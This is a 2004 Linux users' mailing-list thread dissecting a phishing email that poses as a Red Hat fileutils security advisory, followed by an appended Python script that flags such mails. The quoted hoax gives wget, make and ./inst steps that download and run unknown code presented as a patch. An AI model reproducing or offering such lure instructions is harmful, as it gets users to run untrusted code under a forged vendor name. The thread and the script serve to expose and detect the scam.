[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"


Chris Higgins chris.higgins at darach.ie
Sat Oct 23 12:53:33 IST 2004


On Sat, 23 Oct 2004 12:35:44 +0100
Marek <m.mcgann at sussex.ac.uk> wrote:

> Thought you might be interested to see the below - it's the first time
> I've seen anything like this for Linux (apologies for the html mail,
> but that's how it arrived).
> 
> I presume it's this Joeio in Stanford (or whoever) trying to spam his
> way into Red Hat boxes?
> 
> Interesting to see someone considering desktop "not-terribly-clued-in"
> Linux users a worthwhile target.
> 
> Or am I being too suspicious about it?

Erm... get file, download, untar/gz, extract...
That gets you two files, inst.c and a makefile.
The makefile just compiles the program...


No readme, no nothing...

If the clueless desktop user even did try the 
'unpack ; make ; make install ' sequence that is
listed as the 'easy linux way to install software',
it will do nothing - as there is no install target 
for the makefile, and the 'inst' target just compiles
the program and does nothing else. I expected it to
at least do a 'cc inst.c -o inst ; ./inst'... but it doesn't
even try that.

So you'd have to be really stupid not to have any readme
and still figure out that you had to run 'inst', and not
check what's in the inst.c file in the first place.

A first glance at 'inst.c' should get you kinda suspicious
as there is no mention of 'ls' or 'mkdir' anywhere.
As it happens, it starts with "Generic Script Compiler"
copyright Francisco Rosales... no mention of redhat
or anyone else...

I might get the chance to compile and run it later :-)
> 
> ----------  Forwarded Message  ----------
> 
> Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> Date: Saturday 23 October 2004 05:37
> From: RedHat Security Team <security at redhat.com>
> To: <another mailing list I'm subscribed to>
> 
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: RedHat
> 
> A complete revision history is at the end of this file.
> 
> Dear RedHat user,
> 
> Redhat found a vulnerability in fileutils (ls and mkdir), that could
> allow a remote attacker to execute arbitrary code with root
> privileges. Some of the affected linux distributions include RedHat
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
> and not only. It is known that *BSD and Solaris platforms are NOT
> affected.
> 
> The RedHat Security Team strongly advises you to immediately apply
> the fileutils-1.0.6 patch. This is a critical-critical update that
> you must make by following these steps:
> 
>   * First download the patch from the Stanford RedHat mirror:
>     wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
>   * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
>   * cd fileutils-1.0.6.patch
>   * make
>   * ./inst
> 
> Again, please apply this patch as soon as possible or you risk your
> system and others' to be compromised.
> 
> Thank you for your prompt attention to this serious matter,
> 
> RedHat Security Team.
> 
> Copyright (c) 2004 Red Hat, Inc. All rights reserved.
> 
> - -------------------------------------------------------
> -- 
> Irish Linux Users' Group
> http://www.linux.ie/mailman/listinfo/ilug/
> 


-- 
Chris Higgins                              
Darach Technology Ltd                      tel: +353-1-6204370
email: chris.higgins at darach.ie          fax: +353-1-6204371
http://www.darach.ie
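One way to triage a mail like the one forwarded above before anyone types the listed commands, written from the defender's side as an added example (not code from the thread, from Red Hat or from the hoax tarball). The sample mail is constructed from the forwarded text; the three heuristics (download host outside the sender's domain, "fetch, then build and run" instructions, no PGP-signed body) are my assumptions about what separates this hoax from a genuine vendor advisory of the period.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input: the hoax "RedHat Security Team" mail quoted in
# the thread, reduced to plain text (only the lines the checks look at).
SAMPLE_MAIL = """\
From: RedHat Security Team <security@redhat.com>
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
First download the patch from the Stanford RedHat mirror:
wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst
"""

SENDER_RE = re.compile(r"^From:.*?<[^<>@]+@([^<>\s]+)>", re.M)
URL_RE = re.compile(r"\b(?:https?://|www\.)\S+", re.I)
FETCH_RE = re.compile(r"^\s*(?:wget|curl|ftp)\b", re.M)
EXEC_RE = re.compile(r"^\s*(?:\./\S+|make\b|sh\s+\S+|chmod\s+\+x)", re.M)


def url_host(url):
    """Hostname of a URL that may lack a scheme, as in the hoax mail."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname or ""


def triage(mail_text):
    """Return (indicator, detail) pairs that mark an 'advisory' as suspect."""
    m = SENDER_RE.search(mail_text)
    sender_domain = m.group(1).lower() if m else ""
    findings = []
    for url in URL_RE.findall(mail_text):
        host = url_host(url).lower()
        # A vendor fix comes from the vendor's own domain, not a personal
        # directory (~joeio) on an unrelated host.
        if host != sender_domain and not host.endswith("." + sender_domain):
            findings.append(("offsite_download", host))
    if FETCH_RE.search(mail_text) and EXEC_RE.search(mail_text):
        # "download, make, ./inst" of unsigned source is not how vendors
        # ship security updates; those arrive as signed packages.
        findings.append(("build_and_run_download", "make / ./inst"))
    if "BEGIN PGP SIGNED MESSAGE" not in mail_text:
        # Assumption: a real advisory of the time is a PGP-signed text mail.
        findings.append(("unsigned_advisory", sender_domain))
    return findings
```

Running `triage(SAMPLE_MAIL)` flags all three indicators for the forwarded mail; a signed mail whose links stay under the sender's domain produces none.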


